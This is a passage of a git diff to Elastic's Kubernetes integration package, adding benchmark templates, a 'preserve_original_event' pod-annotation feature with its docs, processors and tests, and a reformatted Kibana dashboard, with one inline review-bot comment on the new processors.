"uid": "host-{{ $nodeid }}", + "hostname": "host-{{ $nodeid }}", + "name": "host-{{ $nodeid }}", + "labels": { + "kubernetes_io/hostname": "kubernetes-scale-123456", + "beta_kubernetes_io/os": "linux", + "kubernetes_io/arch": "amd64", + "kubernetes_io/os": "linux", + "beta_kubernetes_io/arch": "amd64" + } + }, + "pod": { + "uid": "demo-pod-{{ $rangeofid }}", + "ip": "{{generate `Ip`}}", + "name": "demo-pod-{{ $rangeofid }}" + }, + "namespace": "demo-{{ $rangeofid }}", + "namespace_uid": "demo-{{ $rangeofid }}", + "replicaset": { + "name": "demo-deployment-{{ $rangeofid }}" + }, + "namespace_labels": { + "kubernetes_io/metadata_name": "demo-{{ $rangeofid }}" + }, + "labels": { + "app":"demo", + "pod-template-hash":"{{ $rangeofid }}", + "app-2":"demo-2", + "app-1":"demo-1" + }, + "deployment": { + "name": "demo-deployment-{{ $rangeofid }}" + } + }, + "agent": { + "name": "kubernetes-scale-123456", + "id": "de42127b-4db8-4471-824e-a7b14f478663", + "ephemeral_id": "22ed892c-43bd-408a-9121-65e2f5b6a56e", + "type": "metricbeat", + "version": "8.8.0" + }, + "elastic_agent": { + "id": "de42127b-4db8-4471-824e-a7b14f478663", + "version": "8.8.0", + "snapshot": true + }, + "cloud": { + "provider": "gcp", + "availability_zone": "europe-west1-d", + "instance":{ + "name": "kubernetes-scale-123456" , + "id": "de42127b-4db8-4471-824e-a7b14f478663" + }, + "machine":{ + "type":"e2-standard-4" + }, + "service":{ + "name":"GCE" + }, + "project":{ + "id":"elastic-obs-integrations-dev" + }, + "account":{ + "id":"elastic-obs-integrations-dev" + } + }, + "orchestrator":{ + "cluster":{ + "name":"kubernetes-scale", + "url":"https://{{ generate `Ip` }}" + } + }, + "ecs": { + "version": "8.0.0" + }, + "data_stream": { + "namespace": "ep", + "type": "metrics", + "dataset": "kubernetes.state_container" + }, + "service": { + "address": "http://kubernetes-scale-123456:8080/metrics", + "type": "kubernetes" + }, + "host": { + "hostname": "kubernetes-scale-123456", + "os": { + "kernel": 
"5.10.47-linuxkit", + "codename": "Core", + "name": "CentOS Linux", + "type": "linux", + "family": "redhat", + "version": "7 (Core)", + "platform": "centos" + }, + "containerized": true, + "name": "kubernetes-scale-123456", + "id": "85e35c2b5e1b39ba72393a6baf6ee7cd", + "architecture": "x86_64" + }, + "metricset": { + "period": 10000, + "name": "state_container" + }, + "event": { + "duration": {{ $event_duration }}, + "agent_id_status": "verified", + "module": "kubernetes", + "dataset": "kubernetes.state_container" + } +} \ No newline at end of file diff --git a/packages/kubernetes/_dev/benchmark/rally/statepod-benchmark/config.yml b/packages/kubernetes/_dev/benchmark/rally/statepod-benchmark/config.yml new file mode 100644 index 00000000000..b21c1538b64 --- /dev/null +++ b/packages/kubernetes/_dev/benchmark/rally/statepod-benchmark/config.yml @@ -0,0 +1,15 @@ +fields: + - name: timestamp + period: 60m + - name: event_duration + range: + min: 1 + max: 1000000 + - name: rangeofid + range: + min: 0 + max: 10000 + - name: status_phase + enum: ["running", "pending", "succeeded", "failed", "unknown"] + - name: status_scheduled + enum: ["true", "false", "unknown"] diff --git a/packages/kubernetes/_dev/benchmark/rally/statepod-benchmark/fields.yml b/packages/kubernetes/_dev/benchmark/rally/statepod-benchmark/fields.yml new file mode 100644 index 00000000000..b66d8979105 --- /dev/null +++ b/packages/kubernetes/_dev/benchmark/rally/statepod-benchmark/fields.yml @@ -0,0 +1,12 @@ +- name: Ip + type: ip +- name: timestamp + type: date +- name: rangeofid + type: integer +- name: event_duration + type: long +- name: status_phase + type: keyword +- name: status_scheduled + type: keyword diff --git a/packages/kubernetes/_dev/benchmark/rally/statepod-benchmark/template.ndjson b/packages/kubernetes/_dev/benchmark/rally/statepod-benchmark/template.ndjson new file mode 100644 index 00000000000..c5d04c86bf4 --- /dev/null 
+++ b/packages/kubernetes/_dev/benchmark/rally/statepod-benchmark/template.ndjson 
@@ -0,0 +1,138 @@ +{{- $timestamp := generate "timestamp" }} +{{- $event_duration := generate "event_duration" }} +{{- $rangeofid := generate "rangeofid" -}} +{{- $nodeid := div $rangeofid 110 -}} +{{- $status_phase := generate "status_phase" }} +{{- $status_scheduled := generate "status_scheduled" }} +{ + "@timestamp": "{{$timestamp.Format "2006-01-02T15:04:05.999999Z07:00"}}", + "kubernetes": { + "node": { + "uid": "host-{{ $nodeid }}", + "hostname": "host-{{ $nodeid }}", + "name": "host-{{ $nodeid }}", + "labels": { + "kubernetes_io/hostname": "kubernetes-scale-123456", + "beta_kubernetes_io/os": "linux", + "kubernetes_io/arch": "amd64", + "kubernetes_io/os": "linux", + "beta_kubernetes_io/arch": "amd64" + } + }, + "pod": { + "uid": "demo-pod-{{ $rangeofid }}", + "host_ip": "{{generate `Ip`}}", + "ip": "{{generate `Ip`}}", + "name": "demo-pod-{{ $rangeofid }}", + "status": { + "phase": "{{ $status_phase }}", + {{- if eq $status_phase "running"}} + "ready": "true", + {{- else if eq $status_phase "pending"}} + "ready": "false", + {{- else if eq $status_phase "failed"}} + "ready": "false", + {{- else if eq $status_phase "succeeded"}} + "ready": "true", + {{- else if eq $status_phase "unknown"}} + "ready": "unknown", + {{- end}} + "scheduled": "{{ $status_scheduled }}" + } + + }, + "namespace": "demo-{{ $rangeofid }}", + "namespace_uid": "demo-{{ $rangeofid }}", + "replicaset": { + "name": "demo-deployment-{{ $rangeofid }}" + }, + "namespace_labels": { + "kubernetes_io/metadata_name": "demo-{{ $rangeofid }}" + }, + "labels": { + "app":"demo", + "pod-template-hash":"{{ $rangeofid }}", + "app-2":"demo-2", + "app-1":"demo-1" + }, + "deployment": { + "name": "demo-deployment-{{ $rangeofid }}" + } + }, + "agent": { + "name": "kubernetes-scale-123456", + "id": "de42127b-4db8-4471-824e-a7b14f478663", + "ephemeral_id": "22ed892c-43bd-408a-9121-65e2f5b6a56e", + "type": "metricbeat", + "version": "8.8.0" + }, + "elastic_agent": { + "id": 
"de42127b-4db8-4471-824e-a7b14f478663", + "version": "8.8.0", + "snapshot": true + }, + "cloud": { + "provider": "gcp", + "availability_zone": "europe-west1-d", + "instance":{ + "name": "kubernetes-scale-123456" , + "id": "de42127b-4db8-4471-824e-a7b14f478663" + }, + "machine":{ + "type":"e2-standard-4" + }, + "service":{ + "name":"GCE" + }, + "project":{ + "id":"elastic-obs-integrations-dev" + }, + "account":{ + "id":"elastic-obs-integrations-dev" + } + }, + "orchestrator":{ + "cluster":{ + "name":"kubernetes-scale", + "url":"https://{{ generate `Ip` }}" + } + }, + "ecs": { + "version": "8.0.0" + }, + "data_stream": { + "namespace": "ep", + "type": "metrics", + "dataset": "kubernetes.state_pod" + }, + "service": { + "address": "http://kubernetes-scale-123456:8080/metrics", + "type": "kubernetes" + }, + "host": { + "hostname": "kubernetes-scale-123456", + "os": { + "kernel": "5.10.47-linuxkit", + "codename": "Core", + "name": "CentOS Linux", + "type": "linux", + "family": "redhat", + "version": "7 (Core)", + "platform": "centos" + }, + "containerized": true, + "name": "kubernetes-scale-123456", + "id": "85e35c2b5e1b39ba72393a6baf6ee7cd", + "architecture": "x86_64" + }, + "metricset": { + "period": 10000, + "name": "state_pod" + }, + "event": { + "duration": {{ $event_duration }}, + "agent_id_status": "verified", + "module": "kubernetes", + "dataset": "kubernetes.state_pod" + } +} \ No newline at end of file diff --git a/packages/kubernetes/_dev/build/docs/README.md b/packages/kubernetes/_dev/build/docs/README.md index 3c92012f223..16d3e0151b2 100644 --- a/packages/kubernetes/_dev/build/docs/README.md +++ b/packages/kubernetes/_dev/build/docs/README.md 
@@ -86,12 +86,21 @@ This defaults to `/var/log/containers/*${kubernetes.container.id}.log`. #### Routing -The container-logs data stream allows routing logs to a different *dataset* or *namespace* using pod annotations. +The container-logs data stream allows routing logs to a different *dataset* or *namespace* using pod annotations. For example, suppose you are running Nginx on your Kubernetes cluster, and you want to drive the Nginx container logs into a dedicated dataset or namespace. By annotating the pod with `elastic.co/namespace: nginx`, the integration will send all the container logs to the `nginx` namespace. To learn more about routing container-logs, see https://docs.elastic.co/integrations/kubernetes/container-logs. +#### Preserve original event + +The agent can be configured to set the tag `preserve_original_event` on container-logs using pod annotation. + +For example, suppose you are routing your Nginx container logs into a dedicated dataset or namespace as described above to make use of the Nginx fleet integration. Enabling preserve_original_event on the Nginx integration will have no effect +since the logs were shipped via kubernetes integration and not Nginx. As well, you may not want to have all original events from all Nginx pods preserved as well. + +By annotating the pod with `elastic.co/preserve_original_event: 'true'`, the integration will add the tag `preserve_original_event` as it would be done by the `nginx` integration otherwise. + ### audit-logs The audit-logs dataset requires access to the log files on each Kubernetes node where the audit logs are stored. diff --git a/packages/kubernetes/_dev/build/docs/container-logs.md b/packages/kubernetes/_dev/build/docs/container-logs.md index a47fc79bde2..c514418d72c 100644 --- a/packages/kubernetes/_dev/build/docs/container-logs.md +++ b/packages/kubernetes/_dev/build/docs/container-logs.md 
@@ -8,17 +8,17 @@ This defaults to `/var/log/containers/*${kubernetes.container.id}.log`. By default only {{ url "filebeat-input-filestream-parsers" "container parser" }} is enabled. Additional log parsers can be added as an advanced options configuration. -## Rerouting based on pod annotations +## Rerouting and preserve original event based on pod annotations -You can customize the routing of container logs events and sending them to different datasets and namespaces using pods' annotations. +You can customize the routing of container logs events and sending them to different datasets and namespaces, +as well as enable `preserve_original_event` based on using pods' annotations. -Routing customization can happen at: +Customization can happen at: - pod definition time, e.g., using a deployment. - pod runtime, annotating pods using `kubectl`. - -### Set routing at pod definition time +### Set at pod definition time Here is an example of an Nginx deployment where we set both `elastic.co/dataset` and `elastic.co/namespace` annotations to route the container logs to specific datasets and namespace, respectively. @@ -38,6 +38,7 @@ spec: annotations: elastic.co/dataset: kubernetes.container_logs.nginx elastic.co/namespace: nginx + elastic.co/preserve_original_event: "true" labels: app: nginx app.kubernetes.io/name: myservice 
@@ -51,10 +52,10 @@ spec: - containerPort: 80 ``` +### Set at runtime -### Set routing at runtime - -Suppose you want to change the container logs routing on a running container. In that case, you can annotate the pod using `kubectl`, and the integration will apply it immediately sending all the following documents to the new destination: +Suppose you want to change the container logs routing and enable `preserve_original_event` on a running container. +In that case, you can annotate the pod using `kubectl`, and the integration will apply it immediately sending all the following documents to the new destination: Here is an example where we route the container logs for a pod running the Elastic Agent to the `kubernetes.container_logs.agents` dataset: 
@@ -68,19 +69,26 @@ Here's a similar example to change the namespace on a pod running Nginx: kubectl annotate pods elastic-agent-managed-daemonset-6p22g elastic.co/namespace=nginx ``` -You can restore the standard routing by removing the annotations: +Here is an example to enable `preserve_original_event` on a pod running Nginx: + +```shell +kubectl annotate pods elastic-agent-managed-daemonset-6p22g elastic.co/preserve_original_event=true +``` + +You can restore the standard settings by removing the annotations: ```shell kubectl annotate pods elastic-agent-managed-daemonset-6p22g elastic.co/dataset- kubectl annotate pods elastic-agent-managed-daemonset-6p22g elastic.co/namespace- +kubectl annotate pods elastic-agent-managed-daemonset-6p22g elastic.co/preserve_original_event- ``` ### Annotations Reference Here are the annotations available to customize routing: - -| Label | Description | -| ---------------------- | -------------------------------------------------------- | -| `elastic.co/dataset` | Defines the target data stream's dataset for this pod. | -| `elastic.co/namespace` | Defines the target data stream's namespace for this pod. | +| Label | Description | +| ------------------------------------ | ---------------------------------------------------------------------------------------------- | +| `elastic.co/dataset` | Defines the target data stream's dataset for this pod. | +| `elastic.co/namespace` | Defines the target data stream's namespace for this pod. | +| `elastic.co/preserve_original_event` | Enables 'preserve_original_event' for this pod. Use string 'true' (case-insensitive) to enable | diff --git a/packages/kubernetes/changelog.yml b/packages/kubernetes/changelog.yml index 502c8fac931..51e2ab9e747 100644 --- a/packages/kubernetes/changelog.yml +++ b/packages/kubernetes/changelog.yml 
@@ -1,4 +1,14 @@ # newer versions go on top +- version: 1.58.0 + changes: + - description: Migrate to format_version v3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9356 +- version: 1.57.0 + changes: + - description: Container logs preserve original content based on pod annotations. + type: enhancement + link: https://github.com/elastic/integrations/pull/9036 - version: 1.56.0 changes: - description: Add new fields to API server, state_node and persistent volume claim data streams. diff --git a/packages/kubernetes/data_stream/apiserver/fields/fields.yml b/packages/kubernetes/data_stream/apiserver/fields/fields.yml index e296a5dee3e..df079d7f505 100644 --- a/packages/kubernetes/data_stream/apiserver/fields/fields.yml +++ b/packages/kubernetes/data_stream/apiserver/fields/fields.yml @@ -170,6 +170,7 @@ description: Request duration, number of operations - name: duration.us.bucket.* type: object + object_type: long description: Request duration, histogram buckets - name: current.count type: long diff --git a/packages/kubernetes/data_stream/container_logs/_dev/test/pipeline/test-common-config.yml b/packages/kubernetes/data_stream/container_logs/_dev/test/pipeline/test-common-config.yml index 0f481f01759..9bc066fce51 100644 --- a/packages/kubernetes/data_stream/container_logs/_dev/test/pipeline/test-common-config.yml +++ b/packages/kubernetes/data_stream/container_logs/_dev/test/pipeline/test-common-config.yml @@ -6,6 +6,7 @@ fields: annotations: elastic_co/dataset: kubernetes.container_logs.nginx elastic_co/namespace: nginx + elastic_co/preserve_original_event: "true" labels: app_kubernetes_io/version: "v0.1.0" app_kubernetes_io/name: "myservice" diff --git a/packages/kubernetes/data_stream/container_logs/_dev/test/pipeline/test-nginx.log-expected.json b/packages/kubernetes/data_stream/container_logs/_dev/test/pipeline/test-nginx.log-expected.json index 1060e297815..82259b27093 100644 
--- a/packages/kubernetes/data_stream/container_logs/_dev/test/pipeline/test-nginx.log-expected.json +++ b/packages/kubernetes/data_stream/container_logs/_dev/test/pipeline/test-nginx.log-expected.json @@ -9,7 +9,8 @@ "kubernetes": { "annotations": { "elastic_co/dataset": "kubernetes.container_logs.nginx", - "elastic_co/namespace": "nginx" + "elastic_co/namespace": "nginx", + "elastic_co/preserve_original_event": "true" }, "labels": { "app_kubernetes_io/name": "myservice", @@ -31,7 +32,8 @@ "kubernetes": { "annotations": { "elastic_co/dataset": "kubernetes.container_logs.nginx", - "elastic_co/namespace": "nginx" + "elastic_co/namespace": "nginx", + "elastic_co/preserve_original_event": "true" }, "labels": { "app_kubernetes_io/name": "myservice", @@ -53,7 +55,8 @@ "kubernetes": { "annotations": { "elastic_co/dataset": "kubernetes.container_logs.nginx", - "elastic_co/namespace": "nginx" + "elastic_co/namespace": "nginx", + "elastic_co/preserve_original_event": "true" }, "labels": { "app_kubernetes_io/name": "myservice", @@ -75,7 +78,8 @@ "kubernetes": { "annotations": { "elastic_co/dataset": "kubernetes.container_logs.nginx", - "elastic_co/namespace": "nginx" + "elastic_co/namespace": "nginx", + "elastic_co/preserve_original_event": "true" }, "labels": { "app_kubernetes_io/name": "myservice", @@ -89,4 +93,4 @@ } } ] -} \ No newline at end of file +} diff --git a/packages/kubernetes/data_stream/container_logs/agent/stream/stream.yml.hbs b/packages/kubernetes/data_stream/container_logs/agent/stream/stream.yml.hbs index abc6a5a9d74..0c451dffe91 100644 --- a/packages/kubernetes/data_stream/container_logs/agent/stream/stream.yml.hbs +++ b/packages/kubernetes/data_stream/container_logs/agent/stream/stream.yml.hbs 
@@ -22,14 +22,14 @@ processors: The kubernetes provider supports[^1] pods annotations, making it possible to add them to the event using the `include_annotations` configuration option. - + However, adding annotations to the event is disabled by default, and it is not possible to enable it on Fleet-managed agents. The following processors are a workaround to add the annotations to the event without using the `include_annotations` configuration option. - + [^1]: https://github.com/elastic/elastic-agent/blob/37ec2bb7ee1d2cc6c0fccf2f0cd0a44eb3d61efd/internal/pkg/composable/providers/kubernetes/pod.go#L311-L315 }} - add_fields: @@ -37,6 +37,7 @@ processors: fields: annotations.elastic_co/dataset: ${kubernetes.annotations.elastic.co/dataset|""} annotations.elastic_co/namespace: ${kubernetes.annotations.elastic.co/namespace|""} + annotations.elastic_co/preserve_original_event: ${kubernetes.annotations.elastic.co/preserve_original_event|""} - drop_fields: fields: - kubernetes.annotations.elastic_co/dataset @@ -51,7 +52,23 @@ processors: equals: kubernetes.annotations.elastic_co/namespace: "" ignore_missing: true -{{#if processors}} +- drop_fields: + fields: + - kubernetes.annotations.elastic_co/preserve_original_event + when: + equals: + kubernetes.annotations.elastic_co/preserve_original_event: "" + ignore_missing: true +- add_tags: + tags: ["preserve_original_event"] + when: + and: + - has_fields: + - kubernetes.annotations.elastic_co/preserve_original_event + - regexp: + kubernetes.annotations.elastic_co/preserve_original_event: "^(?i)true$" + +{{#if processors}} {{processors}} {{/if}} diff --git a/packages/kubernetes/data_stream/container_logs/fields/ecs.yml b/packages/kubernetes/data_stream/container_logs/fields/ecs.yml index e5533027809..0e0f3e7f731 100644 --- a/packages/kubernetes/data_stream/container_logs/fields/ecs.yml +++ b/packages/kubernetes/data_stream/container_logs/fields/ecs.yml 
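Review bot: In the new `add_tags` processor the `has_fields` branch of the `and` condition looks redundant: the `drop_fields` immediately above already removes `kubernetes.annotations.elastic_co/preserve_original_event` when it is empty, and the `regexp` condition on an absent field should evaluate false on its own; either drop the extra branch or add a one-line comment saying why both are kept. The processors in this hunk also carry none of the explanatory commentary the earlier `{{! ... }}` block gives for the dataset/namespace workaround, and a reader cannot tell from here that the tag alone does not retain anything — whether `event.original` is kept is decided by the ingest pipeline of the destination dataset, so a comment like `{{!-- Only tags the event; the pipeline of the routed dataset decides whether event.original is retained --}}` above `- add_tags:` would help. Worth stating in that comment as well is that the switch is pod-annotation driven, i.e. anyone with permission to annotate a pod can turn it on, which is the same trust boundary the dataset/namespace annotations already rely on.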
@@ -26,3 +26,5 @@ name: service.name - external: ecs name: service.version +- external: ecs + name: tags diff --git a/packages/kubernetes/data_stream/container_logs/manifest.yml b/packages/kubernetes/data_stream/container_logs/manifest.yml index d6f4a339f0c..70ed504bfe6 100644 --- a/packages/kubernetes/data_stream/container_logs/manifest.yml +++ b/packages/kubernetes/data_stream/container_logs/manifest.yml @@ -78,5 +78,6 @@ streams: type: yaml default: "" # Ensures agents have permissions to write data to `logs-*-*` -elasticsearch.dynamic_dataset: true -elasticsearch.dynamic_namespace: true +elasticsearch: + dynamic_dataset: true + dynamic_namespace: true diff --git a/packages/kubernetes/docs/README.md b/packages/kubernetes/docs/README.md index 497f32343c1..ce246d7d37c 100644 --- a/packages/kubernetes/docs/README.md +++ b/packages/kubernetes/docs/README.md 
@@ -86,12 +86,21 @@ This defaults to `/var/log/containers/*${kubernetes.container.id}.log`. #### Routing -The container-logs data stream allows routing logs to a different *dataset* or *namespace* using pod annotations. +The container-logs data stream allows routing logs to a different *dataset* or *namespace* using pod annotations. For example, suppose you are running Nginx on your Kubernetes cluster, and you want to drive the Nginx container logs into a dedicated dataset or namespace. By annotating the pod with `elastic.co/namespace: nginx`, the integration will send all the container logs to the `nginx` namespace. To learn more about routing container-logs, see https://docs.elastic.co/integrations/kubernetes/container-logs. +#### Preserve original event + +The agent can be configured to set the tag `preserve_original_event` on container-logs using pod annotation. + +For example, suppose you are routing your Nginx container logs into a dedicated dataset or namespace as described above to make use of the Nginx fleet integration. Enabling preserve_original_event on the Nginx integration will have no effect +since the logs were shipped via kubernetes integration and not Nginx. As well, you may not want to have all original events from all Nginx pods preserved as well. + +By annotating the pod with `elastic.co/preserve_original_event: 'true'`, the integration will add the tag `preserve_original_event` as it would be done by the `nginx` integration otherwise. + ### audit-logs The audit-logs dataset requires access to the log files on each Kubernetes node where the audit logs are stored. diff --git a/packages/kubernetes/docs/container-logs.md b/packages/kubernetes/docs/container-logs.md index 0c45b0ed4b7..92e0490b445 100644 --- a/packages/kubernetes/docs/container-logs.md +++ b/packages/kubernetes/docs/container-logs.md 
@@ -8,17 +8,17 @@ This defaults to `/var/log/containers/*${kubernetes.container.id}.log`. By default only [container parser](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-filestream.html#_parsers) is enabled. Additional log parsers can be added as an advanced options configuration. -## Rerouting based on pod annotations +## Rerouting and preserve original event based on pod annotations -You can customize the routing of container logs events and sending them to different datasets and namespaces using pods' annotations. +You can customize the routing of container logs events and sending them to different datasets and namespaces, +as well as enable `preserve_original_event` based on using pods' annotations. -Routing customization can happen at: +Customization can happen at: - pod definition time, e.g., using a deployment. - pod runtime, annotating pods using `kubectl`. - -### Set routing at pod definition time +### Set at pod definition time Here is an example of an Nginx deployment where we set both `elastic.co/dataset` and `elastic.co/namespace` annotations to route the container logs to specific datasets and namespace, respectively. @@ -38,6 +38,7 @@ spec: annotations: elastic.co/dataset: kubernetes.container_logs.nginx elastic.co/namespace: nginx + elastic.co/preserve_original_event: "true" labels: app: nginx app.kubernetes.io/name: myservice 
@@ -51,10 +52,10 @@ spec: - containerPort: 80 ``` +### Set at runtime -### Set routing at runtime - -Suppose you want to change the container logs routing on a running container. In that case, you can annotate the pod using `kubectl`, and the integration will apply it immediately sending all the following documents to the new destination: +Suppose you want to change the container logs routing and enable `preserve_original_event` on a running container. +In that case, you can annotate the pod using `kubectl`, and the integration will apply it immediately sending all the following documents to the new destination: Here is an example where we route the container logs for a pod running the Elastic Agent to the `kubernetes.container_logs.agents` dataset: 
@@ -68,19 +69,26 @@ Here's a similar example to change the namespace on a pod running Nginx: kubectl annotate pods elastic-agent-managed-daemonset-6p22g elastic.co/namespace=nginx ``` -You can restore the standard routing by removing the annotations: +Here is an example to enable `preserve_original_event` on a pod running Nginx: + +```shell +kubectl annotate pods elastic-agent-managed-daemonset-6p22g elastic.co/preserve_original_event=true +``` + +You can restore the standard settings by removing the annotations: ```shell kubectl annotate pods elastic-agent-managed-daemonset-6p22g elastic.co/dataset- kubectl annotate pods elastic-agent-managed-daemonset-6p22g elastic.co/namespace- +kubectl annotate pods elastic-agent-managed-daemonset-6p22g elastic.co/preserve_original_event- ``` ### Annotations Reference Here are the annotations available to customize routing: - -| Label | Description | -| ---------------------- | -------------------------------------------------------- | -| `elastic.co/dataset` | Defines the target data stream's dataset for this pod. | -| `elastic.co/namespace` | Defines the target data stream's namespace for this pod. | +| Label | Description | +| ------------------------------------ | ---------------------------------------------------------------------------------------------- | +| `elastic.co/dataset` | Defines the target data stream's dataset for this pod. | +| `elastic.co/namespace` | Defines the target data stream's namespace for this pod. | +| `elastic.co/preserve_original_event` | Enables 'preserve_original_event' for this pod. Use string 'true' (case-insensitive) to enable | diff --git a/packages/kubernetes/kibana/dashboard/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013.json b/packages/kubernetes/kibana/dashboard/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013.json index 6a70dac1919..7b1560d2e94 100644 --- a/packages/kubernetes/kibana/dashboard/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013.json 
+++ b/packages/kubernetes/kibana/dashboard/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013.json 
@@ -1,441 +1,449 @@ { - "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "twoLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"adf38acd-ecc8-48b2-b7f3-d6dfd024e46b\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster Name\",\"id\":\"adf38acd-ecc8-48b2-b7f3-d6dfd024e46b\",\"enhancements\":{}}},\"3e873627-001d-47c7-91a8-995014b0ef90\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.namespace\",\"title\":\"Namespace Name\",\"id\":\"3e873627-001d-47c7-91a8-995014b0ef90\",\"enhancements\":{}}},\"f4b8cf46-4644-4713-872d-dccc4aeb1e44\":{\"order\":2,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.cronjob.name\",\"title\":\"CronJob Name\",\"id\":\"f4b8cf46-4644-4713-872d-dccc4aeb1e44\",\"enhancements\":{}}}}" - }, - "description": "Metrics about Cronjobs", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { + "id": "kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-03-13T10:46:00.096Z", + "created_at": "2024-03-13T10:46:00.096Z", + "version": "WzI0MywyXQ==", + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "twoLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"adf38acd-ecc8-48b2-b7f3-d6dfd024e46b\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster 
Name\",\"id\":\"adf38acd-ecc8-48b2-b7f3-d6dfd024e46b\",\"enhancements\":{}}},\"3e873627-001d-47c7-91a8-995014b0ef90\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.namespace\",\"title\":\"Namespace Name\",\"id\":\"3e873627-001d-47c7-91a8-995014b0ef90\",\"enhancements\":{}}},\"f4b8cf46-4644-4713-872d-dccc4aeb1e44\":{\"order\":2,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.cronjob.name\",\"title\":\"CronJob Name\",\"id\":\"f4b8cf46-4644-4713-872d-dccc4aeb1e44\",\"enhancements\":{}}}}" + }, + "description": "Metrics about Cronjobs", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { "filter": [], "query": { - "language": "kuery", - "query": "" + "language": "kuery", + "query": "" } - } + } + }, + "description": "", + "params": { + "fontSize": 10, + "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes 
PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + } }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "syncCursor": true, - "syncTooltips": false, - "useMargins": true + "gridData": { + "h": 7, + "i": "85ecbb8b-9606-4c19-a108-385f825ad7aa", + "w": 32, + "x": 0, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "description": "", - "params": { - "fontSize": 10, - "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", - "openLinksInNewTab": false - }, - "title": "", - "type": "markdown", - "uiState": {} - } - }, - "gridData": { - "h": 7, - "i": "85ecbb8b-9606-4c19-a108-385f825ad7aa", - "w": 32, - "x": 0, - "y": 0 - }, - 
